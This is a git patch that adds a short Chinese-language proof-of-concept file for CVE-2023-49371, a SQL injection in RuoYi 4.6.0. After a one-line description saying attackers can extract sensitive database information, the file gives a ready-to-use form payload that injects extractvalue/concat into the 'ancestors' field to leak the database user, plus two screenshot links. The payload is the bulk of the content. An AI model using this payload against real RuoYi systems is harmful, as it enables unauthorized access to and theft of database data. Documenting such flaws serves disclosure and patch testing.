From 7be1fbdc08db11125bbcb294225f2bbc9e93012e Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 6 Dec 2023 19:28:03 +0800
Subject: [PATCH] =?UTF-8?q?Create=20RuoYi4.6.0=20SQL=E6=B3=A8=E5=85=A5?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9ECVE-2023-49371.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md | 11 +++++++++++
 1 file changed, 11 insertions(+)
 create mode 100644 RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md

diff --git a/RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md b/RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md
new file mode 100644
index 0000000..08e61de
--- /dev/null
+++ b/RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md	
@@ -0,0 +1,11 @@
+## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
+
+若依在4.6版本之前存在SQL注入漏洞，攻击者通过该漏洞可以进行SQL注入利用，从而获取数据库中的敏感信息
+
+## poc
+```
+DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
+```
+![image](https://github.com/wy876/POC/assets/139549762/7c110048-af68-42e5-ba3b-ffb69bb28f17)
+
+![image](https://github.com/wy876/POC/assets/139549762/653098c3-5c6d-45a9-b50a-850b48475662)